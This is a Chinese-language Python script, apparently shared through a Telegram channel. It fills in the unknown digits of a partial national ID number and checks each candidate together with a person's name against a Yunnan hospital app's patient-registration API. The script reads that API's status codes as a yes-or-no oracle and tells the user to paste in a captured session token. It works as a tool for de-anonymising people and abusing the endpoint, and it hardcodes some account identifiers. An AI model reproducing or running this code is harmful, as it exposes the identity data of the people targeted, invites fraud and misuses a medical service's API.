import requests
from concurrent.futures import ThreadPoolExecutor, as_completed
import itertools
import time
import os

def check_id_length(n):
    return len(str(n)) == 18

def check_id_data(n):
    var = [7, 9, 10, 5, 8, 4, 2, 1, 6, 3, 7, 9, 10, 5, 8, 4, 2]
    var_id = ['1', '0', 'X', '9', '8', '7', '6', '5', '4', '3', '2']
    total = 0
    for i in range(17):
        total += int(n[i]) * var[i]
    total %= 11
    return var_id[total] == n[17]

def get_id_cards_from_file(file_path):
    id_cards = []
    if not os.path.exists(file_path):
        print(f"文件 {file_path} 不存在🚫")
        return id_cards
    with open(file_path, "r", encoding="utf-8") as file:
        for line in file:
            line = line.strip()
            if line:
                id_cards.append(line)
    return id_cards

def verify_patient(id_card, patient_name):
    url = "https://appv3-api.ynhdkc.com/apis/v1/patient/customer/patients"
    data = {
        "openid": "oiA4P5PQor-Bx1iuz5UmCQgr0BqE",
        "user_id": 100595988,
        "patient_sex": 1,
        "guarantee_name": patient_name,
        "guarantee_id_card": id_card,
        "birthday": "20081019",
        "patient_name": patient_name,
        "patient_phone": "18888888888",
        "patient_id_card": id_card,
        "is_child": 0,
        "id_card_type": 1,
        "version": "v1",
        "patient_address": "云南省昆明市五华区Eaves",
        "patient_province": "云南省",
        "patient_city": "昆明市",
        "patient_county": "五华区",
        "nation": "汉族",
        "guarantee_relation": 1,
        "wechat_code": "73EFA6796D3869FF82FAE7E81E9814B7"
    }
    headers = {
        "x-uuid": "AF6BB505103BDA7A7C2242F036DF30F9",
        "Accept": "application/json, text/plain, */*",
        #小程序 滇医通 抓包替换即可
        "Authorization": "",
        "isNewToken": "true",
        "Sec-Fetch-Site": "same-site",
        "Accept-Language": "zh-CN,zh-Hans;q=0.9",
        "Accept-Encoding": "gzip, deflate, br",
        "Sec-Fetch-Mode": "cors",
        "Content-Type": "application/json",
        "Origin": "https://appv3.ynhdkc.com",
        "User-Agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 17_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.50(0x1800323d) NetType/WIFI Language/zh_CN miniProgram/wx6fe267aca9b32a2f",
        "Referer": "https://appv3.ynhdkc.com/",
        "Sec-Fetch-Dest": "empty",
        "Connection": "keep-alive"
    }
    response = requests.post(url, headers=headers, json=data)
    if response.status_code == 200 or response.status_code == 409:
        return True
    elif response.status_code == 500:
        return False
    else:
        return None

def generate_id_cards(card, gender_input):
    card_address = card[0:6]
    card_birth = card[6:14]
    card_sequence = card[14:17]
    card_check = card[17:18]
    card_sex = card[16:17]

    address_d = card_address.replace('x', '')
    card_list = []

    char_sets = [list("0123456789")] * 18
    for i, ch in enumerate(card):
        if ch != 'x':
            char_sets[i] = [ch]
        else:
            char_sets[i] = list("0123456789")

    if card[16:17] == "x":
        if gender_input == "男":
            char_sets[16] = ["1", "3", "5", "7", "9"]
        elif gender_input == "女":
            char_sets[16] = ["0", "2", "4", "6", "8"]
        else:
            char_sets[16] = list("0123456789")
    else:
        if gender_input == "男" and card_sex in ["1", "3", "5", "7", "9"]:
            pass
        elif gender_input == "女" and card_sex in ["0", "2", "4", "6", "8"]:
            pass
        else:
            print("输入的性别与身份证号中的性别位不匹配🚫")
            return []

    id_cards = []
    for result in itertools.product(*char_sets):
        id_number = "".join(result)
        if check_id_length(id_number) and check_id_data(id_number):
            id_cards.append(id_number)

    return id_cards

def main():
    print('---Eaves补齐---\n🟢欢迎使用🟢\n本py要素最终归属权由Eaves所有🎉🎉🎉')
    print('补齐加批量二要素一体')
    print('频道 https://t.me/Eaves7')
    print('小程序抓包替换Au即可')
    patient_name = input("请输入姓名: ")

    #改成你的文件路径 如果是批量二要素文件里面就放身份证如果是补齐就不要放身份证
    file_path = "Eaves.txt"
    id_cards = get_id_cards_from_file(file_path)

    if not id_cards:
        print("未找到任何身份证号,开始生成新的身份证号。")
        card = input('请输入基础身份证(用"x"表示未知部分): ')
        gender_input = input("请输入性别(男/女)或‘未知’: ").strip()
        if gender_input not in ["男", "女", "未知"]:
            print("无效的性别输入🚫")
            return
        id_cards = generate_id_cards(card, gender_input)

        if not id_cards:
            print("未能生成任何有效的身份证号🚫")
            return

        save_choice = input("是否将补齐后的身份证号保存到文件?(y/n): ").strip().lower()
        if save_choice == "y":
            file_name = input("请输入文件名(例如 result.txt):").strip()
            if not file_name.endswith(".txt"):
                file_name += ".txt"
            try:
                with open(file_name, "w", encoding="utf-8") as f:
                    for id_card in id_cards:
                        f.write(id_card + "\n")
                print(f"身份证号已成功保存到文件 {file_name}")
            except Exception as e:
                print(f"保存文件时出现错误🚫:{e}")
        else:
            print("补齐后的身份证号如下:")
            for id_card in id_cards:
                print(id_card)
    else:
        print(f"从文件中读取到 {len(id_cards)} 个身份证号。")

    print("开始进行核验...")
    results = []
    start_time = time.time()
    with ThreadPoolExecutor(max_workers=5) as executor:
        futures = {executor.submit(verify_patient, id_card, patient_name): id_card for id_card in id_cards}
        for future in as_completed(futures):
            id_card = futures[future]
            result = future.result()
            if result is True:
                results.append(f"姓名 - {patient_name},身份证号 - {id_card}, - 一致✅")
            elif result is False:
                results.append(f"姓名 - {patient_name},身份证号 - {id_card}, - 不一致⛔️")
            else:
                results.append(f"姓名 - {patient_name},身份证号 - {id_card}, - 未知🚫")
    end_time = time.time()
    print(f"核验完成🎉用时: {end_time - start_time:.2f} 秒")
    for res in results:
        print(res)

if __name__ == "__main__":
    main()
